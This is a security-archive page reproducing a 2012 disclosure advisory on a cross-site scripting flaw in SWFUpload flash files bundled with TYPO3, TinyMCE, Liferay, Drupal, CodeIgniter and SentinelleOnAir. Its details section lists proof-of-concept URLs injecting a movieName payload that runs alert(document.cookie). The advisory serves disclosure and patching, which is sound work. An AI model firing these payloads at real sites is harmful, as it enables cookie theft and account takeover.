exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SWF Upload f10 / f11 Cross Site Scripting

SWF Upload f10 / f11 Cross Site Scripting
Posted Nov 25, 2012
Authored by MustLive

swfupload_f10.swf and swfupload_f11.swf both suffer from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | a064f09576b12ab9d5a45fe75c0226e749c3b0025cd2959f6177a48202d94b92

SWF Upload f10 / f11 Cross Site Scripting

Change Mirror Download
Hello list!

I will draw your attention to XSS vulnerability in other web applications
with swfupload. This is finial advisory concerning different versions of
this flash application. Earlier I've wrote about swfupload in Archiv plugin
for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS,
AionWeb, Liferay Portal, SurgeMail, symfony and that this hole is available
in many other web applications.

In previous letters I've wrote concerning web applications with
swfupload_f8.swf, swfupload_f9.swf and swfupload.swf (which are for Flash
Player 8, 9 and 10). And now I'll write about web applications with
swfupload_f10.swf and swfupload_f11.swf (which are for Flash Player 10 and
11). Here is information about SwfUploadPanel for TYPO3 CMS, Archiv plugin
for TinyMCE, Liferay Portal (Community Edition, which earlier called
Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload
for Codeigniter and SentinelleOnAir - among multiple web applications which
are bundled with swfupload_f10.swf or swfupload_f11.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of SwfUploadPanel for TYPO3 CMS,
Archiv plugin for TinyMCE, Liferay Portal (Community Edition, which earlier
called Standard Edition, and Enterprise Edition), Swfupload for Drupal,
SWFUpload for Codeigniter and SentinelleOnAir. There is no information that
they have fixed this vulnerability in their software (at that this
vulnerability was fixed in WordPress 3.3.2 at 20.04.2012).

The developers of WordPress released new version of flash file (the same did
the developers of XenForo), which could be used by all web developers, which
were using swfupload.

----------
Details:
----------

XSS (WASC-08):

SwfUploadPanel for TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE also contains swfupload_f10.swf, besides described
earlier swfupload_f9.swf and swfupload_f8.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal also contains swfupload_f10.swf, besides described earlier
swfupload_f9.swf and swfupload_f8.swf.

Swfupload for Drupal:

As it can be seen from the project
http://code.google.com/p/drupal-swfupload/ - there is version of Swfupload
for Drupal. But exactly in this project there are no files. But they are in
the project Respectiva (http://code.google.com/p/respectiva/), which is
Drupal with Swfupload.

http://site/js/libs/swfupload_f10.swf

SWFUpload for Codeigniter:

http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

This is concerning swfupload_f10.swf. And concerning swfupload_f11.swf, then
in Google's index there is only one project - SentinelleOnAir, which
contains swfupload_f11.swf.

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close